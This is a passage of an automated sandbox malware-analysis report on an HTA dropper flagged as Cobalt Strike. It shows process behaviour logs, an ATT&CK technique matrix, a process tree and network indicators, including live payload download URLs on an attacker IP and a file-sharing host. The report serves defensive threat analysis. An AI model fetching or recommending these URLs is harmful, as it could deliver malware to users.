        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information111
        Scripting
        Valid Accounts22
        Command and Scripting Interpreter
        111
        Scripting
        11
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote Services1
        Email Collection
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        21
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media2
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts4
        PowerShell
        Logon Script (Windows)Logon Script (Windows)11
        Process Injection
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing
        Cached Domain Credentials13
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564725 Sample: seemebestthings.hta Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 48 ip.3105.filemail.com 2->48 50 3105.filemail.com 2->50 54 Suricata IDS alerts for network traffic 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 14 other signatures 2->60 11 mshta.exe 1 2->11         started        signatures3 process4 signatures5 78 Suspicious command line found 11->78 80 PowerShell case anomaly found 11->80 14 cmd.exe 1 11->14         started        process6 signatures7 82 Detected Cobalt Strike Beacon 14->82 84 Suspicious powershell command line found 14->84 86 Wscript starts Powershell (via cmd or directly) 14->86 88 PowerShell case anomaly found 14->88 17 powershell.exe 3 45 14->17         started        22 conhost.exe 14->22         started        process8 dnsIp9 46 172.245.123.29, 49730, 80 AS-COLOCROSSINGUS United States 17->46 40 seemebestthingswit...reatnaturething.vbS, Unicode 17->40 dropped 42 C:\Users\user\AppData\...\dk54el2n.cmdline, Unicode 17->42 dropped 62 Detected Cobalt Strike Beacon 17->62 64 Suspicious powershell command line found 17->64 66 Obfuscated command line found 17->66 68 2 other signatures 17->68 24 wscript.exe 1 17->24         started        27 csc.exe 3 17->27         started        file10 signatures11 process12 file13 70 Detected Cobalt Strike Beacon 24->70 72 Suspicious powershell command line found 24->72 74 Wscript starts Powershell (via cmd or directly) 24->74 76 3 other signatures 24->76 30 powershell.exe 7 24->30         started        44 C:\Users\user\AppData\Local\...\dk54el2n.dll, PE32 27->44 dropped 33 cvtres.exe 1 27->33         started        signatures14 process15 signatures16 90 Detected Cobalt Strike Beacon 30->90 92 Suspicious powershell command line found 30->92 94 Obfuscated command line found 30->94 35 powershell.exe 15 15 30->35         started        38 conhost.exe 30->38         started        process17 dnsIp18 52 ip.3105.filemail.com 193.30.119.205, 443, 49731 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 35->52

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        seemebestthings.hta21%ReversingLabsScript-WScript.Trojan.Asthma
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFb0%Avira URL Cloudsafe
        http://172.245.123.29/1343/seeme0%Avira URL Cloudsafe
        http://www.microsoft.P0%Avira URL Cloudsafe
        http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        ip.3105.filemail.com
        193.30.119.205
        truefalse
          high
          3105.filemail.com
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFtrue
            • Avira URL Cloud: malware
            unknown
            https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7cfalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1799696139.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://crl.micropowershell.exe, 00000007.00000002.1845149859.0000000007210000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1798045854.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839467704.0000000004B79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839467704.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826086486.0000000005271000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://go.micropowershell.exe, 00000009.00000002.1826086486.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.microsoft.Ppowershell.exe, 00000003.00000002.1803659216.0000000008429000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIFbpowershell.exe, 00000003.00000002.1803659216.0000000008429000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1798045854.0000000004D58000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/powershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1799696139.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000009.00000002.1832384938.00000000062DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://172.245.123.29/1343/seemepowershell.exe, 00000003.00000002.1798045854.0000000005027000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1798045854.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839467704.0000000004B9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826086486.0000000005271000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://3105.filemail.compowershell.exe, 00000009.00000002.1826086486.00000000053C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                193.30.119.205
                                                ip.3105.filemail.comunknown
                                                680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                172.245.123.29
                                                unknownUnited States
                                                36352AS-COLOCROSSINGUStrue
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1564725
                                                Start date and time:2024-11-28 18:49:26 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 4m 45s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:13
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:seemebestthings.hta
                                                Detection:MAL
                                                Classification:mal100.phis.expl.evad.winHTA@17/17@1/2
                                                EGA Information:
                                                • Successful, ratio: 25%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 34
                                                • Number of non-executed functions: 8
                                                Cookbook Comments:
                                                • Found application associated with file extension: .hta
                                                • Stop behavior analysis, all processes terminated
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target mshta.exe, PID 7328 because there are no executed function
                                                • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7864 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: seemebestthings.hta
                                                TimeTypeDescription
                                                12:50:19API Interceptor71x Sleep call for process: powershell.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                193.30.119.205Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                  greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                    Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                      26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                        List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                          Inquiry.jsGet hashmaliciousUnknownBrowse
                                                            Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                              creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                  thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                    172.245.123.29Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                    • 172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    ip.3105.filemail.comSwiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                    • 193.30.119.205
                                                                    greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                    • 193.30.119.205
                                                                    Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                    • 193.30.119.205
                                                                    26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                    • 193.30.119.205
                                                                    List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                    • 193.30.119.205
                                                                    Inquiry.jsGet hashmaliciousUnknownBrowse
                                                                    • 193.30.119.205
                                                                    Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                    • 193.30.119.205
                                                                    creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                    • 193.30.119.205
                                                                    sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                    • 193.30.119.205
                                                                    thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                    • 193.30.119.205
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    DFNVereinzurFoerderungeinesDeutschenForschungsnetzeseSwift copy.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                    • 193.30.119.112
                                                                    RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                    • 193.30.119.112
                                                                    mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 149.222.26.100
                                                                    createdgoodthingsfor.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                    • 193.30.119.112
                                                                    Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                    • 193.30.119.112
                                                                    arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 129.217.2.227
                                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 134.31.152.220
                                                                    sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 136.172.219.244
                                                                    nabspc.elfGet hashmaliciousUnknownBrowse
                                                                    • 139.22.48.239
                                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 149.205.100.127
                                                                    AS-COLOCROSSINGUSSwift copy.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                    • 198.46.178.192
                                                                    RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                    • 172.245.123.3
                                                                    loligang.x86-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                                    • 198.12.104.150
                                                                    Bukti-Transfer.vbeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 192.3.220.6
                                                                    Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                    • 172.245.123.29
                                                                    greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                    • 23.95.128.215
                                                                    niceidea.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                    • 192.3.95.197
                                                                    Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                    • 104.168.46.26
                                                                    Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                    • 104.168.46.26
                                                                    Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                    • 104.168.46.26
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0eRE ADVANCE REMITTANCE-INV000567.exeGet hashmaliciousUnknownBrowse
                                                                    • 193.30.119.205
                                                                    QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                    • 193.30.119.205
                                                                    1C24TBP_00000143.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 193.30.119.205
                                                                    RE ADVANCE REMITTANCE-INV000567.exeGet hashmaliciousUnknownBrowse
                                                                    • 193.30.119.205
                                                                    QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                    • 193.30.119.205
                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                    • 193.30.119.205
                                                                    tnljashd27.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                    • 193.30.119.205
                                                                    sdfgdsfkjg27.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                    • 193.30.119.205
                                                                    tnkjasdhf27.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                    • 193.30.119.205
                                                                    QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.30.119.205
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
